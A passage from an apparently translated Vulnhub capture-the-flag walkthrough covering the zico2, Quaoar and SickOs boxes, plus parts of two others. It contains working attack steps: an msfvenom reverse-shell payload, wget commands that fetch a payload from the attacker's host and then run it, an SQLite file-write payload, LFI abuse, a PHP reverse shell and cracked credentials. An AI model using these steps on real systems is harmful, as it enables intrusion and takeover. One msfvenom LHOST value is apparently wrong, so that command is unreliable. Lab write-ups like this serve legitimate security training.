Getting a root shell</h3><p>The payload generated with msfvenom has already been uploaded, so reuse it here. First exit the <code>shell</code>, send the session to the background with <code>background</code>, then start the listener again and put it in the background too.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277724353655.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Use the special file to run the msf payload as root:</p><pre class="md-fences md-end-block" lang="">sudo ./xxxlogauditorxxx.py
/var/log/apache2/access.log|./shell.elf</pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277726121084.jpg' alt='' referrerPolicy='no-referrer' /></p><p>After the py script runs it reports an error, but that does not stop the payload from running.</p><p>Enter the shell of session 2 and check the privileges:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277727104925.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9122' class='md-header-anchor '></a>Getting the flag</h2><p>root's home directory contains <code>flag.png</code>:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729121417.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Download it and analyse it locally:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729313511.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729611404.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The next step is presumably image steganography.</p><p>Analysis finds a base64 string at the end of the image file.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277730366648.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Write the base64 into <code>flag.txt</code> and decode it to get the flag:</p><p><code>cat flag.txt | base64 -d</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277731880443.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9145' class='md-header-anchor '></a>Review of the approach</h2><p>With the final goal reached, look back at the points that failed earlier.</p><h3><a name='header-n9148' class='md-header-anchor '></a>1. 
Web-side exploitation failures</h3><p>First, look at the core code of <code>index.php</code>:</p><pre class="md-fences md-end-block" lang="php">&lt;?php
$file = $_GET["file"];

// Blacklist filter: each keyword is removed case-insensitively (str_ireplace)
// in a single pass. This is not an allow-list of permitted files.
$file = str_ireplace("etc","", $file);
$file = str_ireplace("php:","", $file);
$file = str_ireplace("expect:","", $file);
$file = str_ireplace("data:","", $file);
$file = str_ireplace("proc","", $file);
$file = str_ireplace("home","", $file);
$file = str_ireplace("opt","", $file);

if ($file == "/var/log/auth.log") {
header("location: index.php");
}
else{
include($file);
}

// header() only sets a response header and does not stop execution,
// so this second include still runs, even for /var/log/auth.log.
include($file);
?&gt;</pre><p>As the code shows, <code>index.php</code> blanks out a set of keywords.</p><p>That explains the earlier failures:</p><ul><li>Reading files through a PHP wrapper failed</li></ul><p><code>php:</code> is filtered, and the match is case-insensitive (<code>str_ireplace</code>), so the <code>php://</code> wrappers cannot be used to read files.</p><ul><li>Reading configuration files, the passwd file, etc. failed</li></ul><p><code>etc</code> is filtered, so nothing under <code>/etc</code> can be read</p><ul><li>Reading the Apache access log failed.</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277739100061.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Because of file permissions, the <code>www-data</code> user can neither write nor read Apache's log files, so including the Apache log fails.</p><h3><a name='header-n9176' class='md-header-anchor '></a>2. System-side exploitation failures</h3><ul><li>Privilege escalation via an overflow exploit failed</li></ul><p>Analysing the error output, the likely cause is that the target is a 32-bit system while the exploit only supports 64-bit systems.</p><h2><a name='header-n9183' class='md-header-anchor '></a>Summary of the approach</h2><p>Key steps:</p><ol start='' ><li>Discovering the PHP local file inclusion vulnerability</li><li>Writing a PHP one-liner into the SSH log</li><li>Combining LFI and the SSH log to get a shell</li><li>Generating a payload with MSF, then planting and running it through the one-liner</li><li>Escalating privileges through a misconfigured SUID program</li></ol><p>There are several alternative routes through this box, for example:</p><ol start='' ><li>Fuzzing the file inclusion with a wordlist of configuration files.</li><li>Getting a reverse shell with NC or another technique.</li></ol><p>The Metasploit Framework also offers many convenient features; mastering them simplifies certain steps considerably and is worth studying in depth.</p><p>Overall this box is fairly simple: one web service and one SSH service, so the exploitation points are limited to those two and the path is clear, which makes it easy to complete.</p><h1><a name='header-n9215' class='md-header-anchor '></a>Section 9: zico2</h1><h2><a name='header-n9217' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n9218' class='md-header-anchor '></a>Download link</h3><p> <a href='https://download.vulnhub.com/zico/zico2.ova' target='_blank' class='url'>https://download.vulnhub.com/zico/zico2.ova</a></p><h3><a name='header-n9221' class='md-header-anchor
'></a>Runtime environment</h3><ul><li>The target is provided as an OVA image and the official recommendation is VirtualBox: download it from Vulnhub and import it into VirtualBox to run it.</li><li>Target: set the VM's network adapter to bridged mode.</li><li>Attacker: a Kali VM, also in bridged mode, can then reach the target.</li></ul><h3><a name='header-n9232' class='md-header-anchor '></a>Target description</h3><p>Difficulty: intermediate.</p><p>Goal: compromise the target, obtain root privileges, and read the flag file.</p><p>The official hint: enumerate, enumerate, enumerate.</p><h2><a name='header-n9239' class='md-header-anchor '></a>Information gathering</h2><ul><li><p>IP discovery</p><p>First check Kali's network configuration. <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852282391.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then use nmap to find the target. <code>nmap -sP 192.168.1.0/24</code> shows four hosts of interest on the subnet.</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852529644.jpg' alt='' referrerPolicy='no-referrer' /></p></li><li><p>Port scanning and service identification</p><p>Scan the <code>192.168.1.0/24</code> range with nmap's fast-scan option (<code>-F</code>)</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307853380399.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The <code>MAC</code> address makes it obvious that <code>192.168.1.3</code> is the VM running on VirtualBox, i.e. the target we built.</p><p>With the target IP confirmed, run a more thorough nmap scan against it: <code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>The options:</p><ul><li><code>-A</code> aggressive scan: enables OS detection, version detection, default script scanning and traceroute to gather as much information as possible;</li><li><code>-v</code> verbose output during the scan;</li><li><code>-oN</code> write the results as normal text to <code>nmap.txt</code>. The result: <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307855078046.jpg' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>Threat modelling</p><p>The nmap results show ports <code>22</code>, <code>80</code> and <code>111</code> open on a <code>Linux</code> host. Port <code>22</code> is <code>SSH</code>; port <code>80</code> is <code>http</code>, served by <code>Apache/2.2.22</code>.</p><p>Web applications usually have a variety of issues, so after this initial analysis the web service is chosen as the entry point.</p></li></ul><h2><a name='header-n9286' class='md-header-anchor '></a>Web vulnerability discovery</h2><h3><a name='header-n9287'
class='md-header-anchor '></a>1. Scanning the site directories with dirb</h3><p><code>dirb http://192.168.1.3</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307858659578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>A sensitive directory, <code>dbadmin</code>, is found</p><h3><a name='header-n9294' class='md-header-anchor '></a>2. Directory listing</h3><p>Visiting <code>http://192.168.1.3/dbadmin/</code> shows that directory listing is enabled and that a <code>test_db.php</code> file exists.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307859615079.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9299' class='md-header-anchor '></a>3. Weak password</h3><p><code>http://192.168.1.3/dbadmin/test_db.php</code> turns out to be a web-based SQLite administration tool, the SQLite counterpart of phpMyAdmin for MySQL.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307860283151.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The weak password <code>admin</code> gets us in.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307865109650.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9308' class='md-header-anchor '></a>4.
phpLiteAdmin information gathering</h3><p>Inspecting the existing database reveals two accounts; their hashes were cracked with somd5.com.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307883468354.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This yields:</p><pre class="md-fences md-end-block" lang="">root 34kroot34
zico zico2215@</pre><h3><a name='header-n9316' class='md-header-anchor '></a>5.
File inclusion vulnerability</h3><p>Browsing the site reveals a link of the form <a href='http://192.168.1.3/view.php?page=tools.html' target='_blank' class='url'>http://192.168.1.3/view.php?page=tools.html</a></p><p>This suggests a file inclusion vulnerability, and indeed the Linux passwd file can be included successfully.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307882619884.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9323' class='md-header-anchor '></a>Obtaining a webshell</h2><h3><a name='header-n9324' class='md-header-anchor '></a>1. Attempt: getting a shell by creating a new database</h3><p>SQLite is a single-file database, similar to Access, and is widely used in embedded devices. The idea is to create a database named <code>shell.php</code>, which would produce a file of that name on disk. However, the database files live under <code>/usr/databases/test_users</code></p><p>So we try to create a database named <code>../../var/www/html/shell.php</code>.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307866554332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The database is created, but <code>/</code> is stripped from the name. This approach fails, but it is recorded here as a possible foothold.</p><h3><a name='header-n9335' class='md-header-anchor '></a>2. Attempt: getting a shell by writing a file through SQL</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307867627327.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Payload: <code>ATTACH DATABASE '/var/www/html/shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('&lt;?php phpinfo();?&gt;');</code></p><p>Writing a file this way requires:</p><ol start='' ><li>Direct access to the database to execute SQL statements.</li><li>Stacked queries enabled (disabled by default)</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307875215505.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Execution fails; this avenue is abandoned.</p><h3><a name='header-n9353' class='md-header-anchor '></a>3.
Getting a shell with phpLiteAdmin and the file inclusion vulnerability</h3><p>The earlier steps uncovered a file inclusion vulnerability and database access. Combined, they yield a shell:</p><ol start='' ><li>Add a record through phpLiteAdmin so that the payload is written into the database file.</li><li>Include the database file through the file inclusion vulnerability to get a shell.</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307890668345.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307891213556.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9371' class='md-header-anchor '></a>4. Planting a Meterpreter shell</h3><p>First generate an MSF executable payload.</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f elf > ~/Desktop/msf.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307919687573.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then start a simple web server with Python: <code>python -m SimpleHTTPServer 80</code></p><p>Using the one-liner obtained earlier, run commands to download the payload and execute it.</p><p>Download the payload: <code>x=system('wget http://192.168.1.4:9999/msf.elf');</code></p><p>A subsequent <code>x=system('ls');</code> shows the file was not saved, presumably because of permissions, so download it straight into <code>/tmp</code></p><p><code>x=system('wget http://192.168.1.4:9999/msf.elf -O /tmp/msf.elf');</code></p><p>Check: <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307925456818.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then make it executable and run it.</p><pre class="md-fences md-end-block" lang="">x=system('chmod +x /tmp/msf.elf');
x=system('/tmp/msf.elf');</pre><p>Result: <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926464521.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9401' class='md-header-anchor '></a>Privilege escalation</h2><p>The basic approach to Linux privilege escalation:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9408' class='md-header-anchor '></a>1.
Privilege escalation with msf</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>No usable privilege escalation exploit is found.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307944129988.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9417' class='md-header-anchor '></a>2. Overflow exploit</h3><p>With a Meterpreter shell on the target, take a quick look at the system information. <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926898597.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The system is <code>Ubuntu 12.04 (Linux 3.2.0-23-generic)</code>. Search <code>www.exploit-db.com</code> for a matching exploit.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928156767.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The second exploit is used here: <code>https://www.exploit-db.com/exploits/33589/</code></p><p>Usage: <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928690163.jpg' alt='' referrerPolicy='no-referrer' /></p><p>First write the C source to the target through the Meterpreter shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307929385748.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Drop into a shell and spawn a proper TTY with Python: <code>python -c 'import pty;pty.spawn("/bin/bash")'</code>.</p><p>Then compile and run the exploit.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931869735.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9443' class='md-header-anchor '></a>Getting the flag</h2><p><code>flag.txt</code> is found in root's home directory: <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931748150.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9447' class='md-header-anchor '></a>Reviewing the approach</h2><p>With the final objective reached, let's revisit the earlier failed attempts.</p><h3><a name='header-n9450'
class='md-header-anchor '></a>1. Why writing a shell through phpLiteAdmin failed</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307932678504.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The web root is <code>/var/www</code>, not <code>/var/www/html</code>, and the permissions on the <code>www</code> directory itself do not allow writing a shell there directly.</p><p>The other directories under <code>/var/www/</code>, however, have very permissive permissions, and a shell can be written there directly.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307933864994.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9459' class='md-header-anchor '></a>2. Retrying the phpLiteAdmin shell write</h3><p>We now know the site's absolute path, and that the other folders in the web directory have flawed permissions.</p><p>Try writing the shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307936953989.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Written successfully:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307937353945.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9472' class='md-header-anchor '></a>Summary of the approach</h2><p>Key steps:</p><ol start='' ><li>Weak phpLiteAdmin login password</li><li>Writing a PHP one-liner into the database file through phpLiteAdmin</li><li>Combining LFI and the database file to get a shell</li><li>Generating a payload with MSF, finding a writable directory through the one-liner, then planting and running it</li><li>Escalating to root through a system vulnerability</li></ol><p>There are several alternative routes through this box, for example:</p><ol start='' ><li>Fuzzing the file inclusion with a wordlist of configuration and log files, e.g. getting a shell by including the SSH log.</li><li>Fuzzing the site's absolute path and writing a shell through phpLiteAdmin.</li></ol><p>Overall this is an interesting box. It covers basic web vulnerabilities, chaining them with phpLiteAdmin, and directory permission settings, and it can be solved in several ways, which makes it very replayable.</p><h1><a name='header-n9507' class='md-header-anchor '></a>Section 10: Quaoar</h1><h2><a name='header-n9508' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n9509' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/hackfest2016/Quaoar.ova' target='_blank' class='url'>https://download.vulnhub.com/hackfest2016/Quaoar.ova</a></p><h3><a name='header-n9512' class='md-header-anchor
'></a>Runtime environment</h3><ul><li>The target is provided as an OVA image and the official recommendation is VirtualBox: download it from Vulnhub and import it into VirtualBox to run it.</li><li>Target: set the VM's network adapter to bridged mode.</li><li>Attacker: a Kali VM, also in bridged mode, can then reach the target.</li></ul><h3><a name='header-n9523' class='md-header-anchor '></a>Target description</h3><p>Difficulty: beginner.</p><p>Goal: compromise the target, find the flags, and obtain root privileges.</p><p>Tools recommended by the author: <code>nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra</code></p><h2><a name='header-n9530' class='md-header-anchor '></a>Information gathering</h2><ul><li><p>IP discovery</p><p>First check Kali's network configuration. <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/1.JPG' alt='' referrerPolicy='no-referrer' /></p><p>The target VM displays its own IP on the console</p></li></ul><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/2.JPG' alt='' referrerPolicy='no-referrer' /></p><ul><li><p>Port scanning and service identification</p><p>With the target IP confirmed, run a more thorough nmap scan against it: <code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>The options:</p><ul><li><code>-A</code> aggressive scan: enables OS detection, version detection, default script scanning and traceroute to gather as much information as possible;</li><li><code>-v</code> verbose output during the scan;</li><li><code>-oN</code> write the results as normal text to <code>nmap.txt</code>. The result: <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/3.JPG' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>Threat modelling</p><p>The nmap results show ports <code>22</code> and <code>80</code> open on a <code>Linux</code> host. Port <code>22</code> is <code>SSH</code>; port <code>80</code> is <code>http</code>, served by <code>Apache/2.2.22</code>.</p><p>Web applications usually have a variety of issues, so after this initial analysis the web service is chosen as the entry point.</p></li></ul><h2><a name='header-n9573' class='md-header-anchor '></a>Web vulnerability discovery</h2><h3><a name='header-n9575' class='md-header-anchor '></a>1.
Scanning the site directories with dirb</h3><p><code>dirb http://172.19.0.182</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/4.JPG' alt='' referrerPolicy='no-referrer' /></p><p>Found robots.txt, an upload directory and a wordpress directory.</p><p>robots.txt also points to the wordpress directory</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/5.JPG' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9586' class='md-header-anchor '></a>2. Weak password</h3><p>Scan the site with wpscan</p><pre class="md-fences md-end-block" lang="">wpscan -u http://172.19.0.182/wordpress --wp-content-dir wp-content --enumerate u

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
 +----+--------+--------+
 | Id | Login  | Name   |
 +----+--------+--------+
 | 1  | admin  | admin  |
 | 2  | wpuser | wpuser |
 +----+--------+--------+
[!] Default first WordPress username 'admin' is still used

[+] Finished: Fri Jul 6 22:13:24 2018
[+] Requests Done: 62
[+] Memory used: 63.867 MB
[+] Elapsed time: 00:00:05
</pre><p>The weak credentials <code>admin admin</code> get us in.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/6.JPG' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9599' class='md-header-anchor '></a>Obtaining a webshell</h2><h3><a name='header-n9600' class='md-header-anchor '></a>1.
Getting a shell with a modified reverse shell</h3><p><code>cp /usr/share/webshells/php/php-reverse-shell.php shelly.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/7.JPG' alt='' referrerPolicy='no-referrer' /></p><p>Edit the shell, start an NC listener locally, then request a non-existent page to receive the shell</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/8.JPG' alt='' referrerPolicy='no-referrer' /></p><p>Upgrade to a proper TTY with python</p><p><code>python -c 'import pty; pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/9.JPG' alt='' referrerPolicy='no-referrer' /></p><p>With these privileges, the first flag is obtained</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/10.JPG' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9622' class='md-header-anchor '></a>Privilege escalation</h2><h3><a name='header-n9623' class='md-header-anchor '></a>1. Checking application passwords for reuse</h3><p>Inspect the wordpress configuration file</p><p>It contains the root account's password</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/11.JPG' alt='' referrerPolicy='no-referrer' /></p><p>Root obtained</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/12.JPG' alt='' referrerPolicy='no-referrer' /></p><p>And the second flag</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/13.JPG' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n9642' class='md-header-anchor '></a>Section 11: SickOs 1.1</h1><h2><a name='header-n9643' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n9644' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/sickos/sick0s1.1.7z' target='_blank' class='url'>https://download.vulnhub.com/sickos/sick0s1.1.7z</a></p><h3><a name='header-n9647' class='md-header-anchor '></a>Runtime environment</h3><ul><li>The target is provided as an OVF image and the official recommendation is VMware
Workstation: download it from Vulnhub and import it into VMware Workstation to run it.</li><li>Target: NAT, IP assigned automatically.</li><li>Attacker: NAT, IP assigned automatically: 192.168.202.128.</li></ul><h3><a name='header-n9658' class='md-header-anchor '></a>Target description</h3><p>Goal: obtain root privileges and read /root/a0216ea4d51874464078c618298b1367.txt.</p><h2><a name='header-n9661' class='md-header-anchor '></a>Information gathering</h2><ul><li>IP discovery</li></ul><p>The target is on 192.168.202.1/24; an nmap scan gives its IP: 192.168.202.133. <img src='https://i.imgur.com/Sa8He6D.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port scanning and service identification: a full-port scan of the host gives:</li></ul><p><img src='https://i.imgur.com/J4QyA5e.png' alt='' referrerPolicy='no-referrer' /></p><p>A squid proxy is running. Configure the browser to use it and visit <a href='http://192.168.202.133/' target='_blank' class='url'>http://192.168.202.133/</a>: <img src='https://i.imgur.com/TgWO3gi.png' alt='' referrerPolicy='no-referrer' /> Preliminary conclusion: vulnerability hunting against the target has to go through the proxy.</p><h2><a name='header-n9680' class='md-header-anchor '></a>Web vulnerability discovery</h2><p>Directory brute-forcing through the proxy: <img src='https://i.imgur.com/ECYErtb.png' alt='' referrerPolicy='no-referrer' /></p><p>robots.txt: <img src='https://i.imgur.com/540LyET.png' alt='' referrerPolicy='no-referrer' /></p><p>The site is wolfcms; the front end consists of static pages with nothing exploitable. <img src='https://i.imgur.com/8SFGttD.png' alt='' referrerPolicy='no-referrer' /></p><p>The default address <a href='http://192.168.202.133/wolfcms/?/admin/' target='_blank' class='url'>http://192.168.202.133/wolfcms/?/admin/</a> leads to the admin back end: <img src='https://i.imgur.com/qcutT1t.png' alt='' referrerPolicy='no-referrer' /></p><p>The weak credentials admin/admin grant access to the back end. The version hint shows the CMS is older than 0.8.3.1, which may be vulnerable to arbitrary file upload: <img src='https://i.imgur.com/9E9RE38.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9696' class='md-header-anchor '></a>Obtaining a webshell</h2><h3><a name='header-n9697' class='md-header-anchor '></a>Approach one</h3><p>The back end accepts uploads with any extension, so a full-featured webshell can be uploaded: <img src='https://i.imgur.com/jfLyKEn.png' alt='' referrerPolicy='no-referrer' /></p><p>Reading the target file directly fails for lack of permissions; nothing is returned: <img src='https://i.imgur.com/QfC7XrW.png' alt='' referrerPolicy='no-referrer'
/></p><p>Checking open ports shows 3306 listening, but the MySQL version is above 5.1, so UDF privilege escalation is not possible: <img src='https://i.imgur.com/YIMuln3.png' alt='' referrerPolicy='no-referrer' /></p><p>Use the webshell's reverse-shell feature to get a shell: <img src='https://i.imgur.com/fJFfkXY.png' alt='' referrerPolicy='no-referrer' /> <img src='https://i.imgur.com/YRV0vtL.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9711' class='md-header-anchor '></a>Approach two</h3><p>The directory scan also turned up a cgi-bin directory; a web search suggests it may be affected by a bash vulnerability that gives a shell directly. Use nc to catch the reverse shell. <img src='https://i.imgur.com/ySdDGRs.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9715' class='md-header-anchor '></a>Privilege escalation</h2><p>Trying su to switch users or sudo to read the file directly fails for lack of permissions: <img src='https://i.imgur.com/Pr3iY30.png' alt='' referrerPolicy='no-referrer' /></p><p>Enter the directory where the site is deployed: <img src='https://i.imgur.com/8nWd3GZ.png' alt='' referrerPolicy='no-referrer' /></p><p>There is a configuration file; with luck it stores plaintext credentials: <img src='https://i.imgur.com/Q24NuxO.png' alt='' referrerPolicy='no-referrer' /></p><p>Connecting to the database with the recovered credentials fails, as does logging in as root with the same password. <img src='https://i.imgur.com/qnjk8X0.png' alt='' referrerPolicy='no-referrer' /></p><p>Looking at the other system users, the sickos account stands out: <img src='https://i.imgur.com/s3vVfpI.png' alt='' referrerPolicy='no-referrer' /></p><p>Logging in with username sickos and password john@123 succeeds. <img src='https://i.imgur.com/RDHnQfj.png' alt='' referrerPolicy='no-referrer' /></p><p>Read the file with sudo: <img src='https://i.imgur.com/remDsux.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9737' class='md-header-anchor '></a>Summary of the approach</h2><p>1. Obtain a system shell through the file upload vulnerability or the bash vulnerability.</p><p>2. Deployed sites may store plaintext database and user passwords that can be reused.</p><h1><a name='header-n9742' class='md-header-anchor '></a>Section 12: BSides-Vancouver-2018-Workshop</h1><h2><a name='header-n9743' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n9745' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova' target='_blank' class='url'>https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova</a></p><h3><a name='header-n9748'
class='md-header-anchor '></a>Target description</h3><p>The target was built with VirtualBox; the goal is to obtain root-level access on it.</p><h3><a name='header-n9751' class='md-header-anchor '></a>Objective</h3><p>Boot to root: obtain root privileges and the flag.</p><h3><a name='header-n9754' class='md-header-anchor '></a>Runtime environment</h3><ul><li>Target: open the VM in VirtualBox with networking in host-only mode, or bridge both the VM and the Kali box to the physical machine's wireless adapter. In testing, the VM did not obtain an IP when imported into VMware, but did so in VirtualBox.</li><li>Attacker: a Windows attacker (the physical host) on the same subnet with Nmap, Burp Suite, Wireshark, Sqlmap, nc, Hydra, Python 2.7, DirBuster, AWVS, Nessus and other penetration tools installed. Kali Linux, which ships with a comprehensive toolset, can be used as the attacker instead.</li></ul><h2><a name='header-n9762' class='md-header-anchor '></a>Information gathering</h2><ul><li>IP identification</li></ul><p>Start the VM and scan the /24 with nmap: <code>nmap -sP 192.168.56.0/24</code> gives the VM's IP, 192.168.56.101</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port and service identification</li></ul><p>Nmap command: <code>nmap -p1-65535 -open -A 192.168.56.101 -oN BSides.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Open ports and services:</p><table><thead><tr><th>Port</th><th>Service</th><th>Notes</th></tr></thead><tbody><tr><td>21</td><td>FTP</td><td>vsftpd 2.3.5, anonymous login allowed</td></tr><tr><td>22</td><td>ssh</td><td>OpenSSH 5.9p1</td></tr><tr><td>80</td><td>http</td><td>Apache httpd 2.2.22 (Ubuntu)</td></tr></tbody></table><h2><a name='header-n9790' class='md-header-anchor 